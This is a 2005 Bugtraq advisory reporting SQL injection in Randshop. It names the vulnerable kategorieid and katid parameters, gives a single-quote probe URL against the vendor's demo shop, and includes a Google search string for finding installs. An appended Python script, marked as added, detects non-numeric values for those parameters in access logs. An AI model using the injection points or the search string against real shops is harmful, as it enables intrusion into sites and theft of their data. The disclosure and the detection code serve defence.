[41382] in bugtraq


Randshop all versions SQL Injection

daemon@ATHENA.MIT.EDU (liz0@bsdmail.com)
Mon Nov 28 15:44:45 2005

Date: 28 Nov 2005 15:26:35 -0000
Message-ID: <20051128152635.10237.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: liz0@bsdmail.com
To: bugtraq@securityfocus.com

Randshop all versions SQL Injection

Website: http://www.randshop.com

Demo: http://www.randshop.com/demoshop/
-------------------------------------------------------------------
Credit: Liz0ziM & wannacut  Mail: Liz0@bsdmail.com  www.biyo.tk

-------------------------------------------------------------------
exploit :

http://[victim]/folder/themes/kategorie/index.php?kategorieid=6[SQL]
http://[victim]/folder/themes/kategorie/index.php?katid=40[SQL]

--------------------------------------------------------------------------------
eg:

http://www.randshop.com/demoshop/themes/kategorie/index.php?kategorieid=21'

--------------------------------------------------------------------

Google:intext:"software 2004-2005 by randshop"





http://www.blogcu.com/Liz0ziM/112800/



http://biyo.5gigs.com/randshop.txt
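
Added example, not part of the original post or of Randshop's code: a log check that flags requests to the endpoint named above whose kategorieid or katid value is not a plain integer. It assumes common/combined access log format and that these ids are numeric (as the values 6, 40 and 21 above suggest); the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoint and parameters named in the advisory.
ENDPOINT = "/themes/kategorie/index.php"
PARAMS = {"kategorieid", "katid"}

# Assumption: access log lines in common/combined log format.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate ids are short decimal integers.
NUMERIC_ID = re.compile(r"[0-9]{1,10}")


def suspicious_params(request_target):
    """Return [(name, value)] for advisory parameters whose value is not a plain integer."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith(ENDPOINT):
        return []
    hits = []
    # parse_qsl percent-decodes values, so %27 is compared as a quote character.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in PARAMS and not NUMERIC_ID.fullmatch(value):
            hits.append((name, value))
    return hits


def scan(log_lines):
    """Yield (line_number, hits) for log lines that reach the endpoint with a non-numeric id."""
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if m:
            hits = suspicious_params(m.group(1))
            if hits:
                yield n, hits


# Constructed sample log lines (not real traffic).
SAMPLE = [
    '192.0.2.10 - - [28/Nov/2005:15:30:01 +0000] "GET /demoshop/themes/kategorie/index.php?kategorieid=21 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [28/Nov/2005:15:30:07 +0000] "GET /demoshop/themes/kategorie/index.php?kategorieid=21%27 HTTP/1.1" 200 812',
    '192.0.2.11 - - [28/Nov/2005:15:30:09 +0000] "GET /shop/themes/kategorie/index.php?katid=40&kategorieid=6 HTTP/1.1" 200 5003',
    '192.0.2.12 - - [28/Nov/2005:15:31:00 +0000] "GET /index.php?katid=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE):
        print(lineno, hits)
```

The same integer-only rule, applied server-side before the value reaches the query, is the corresponding input check for these two parameters.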
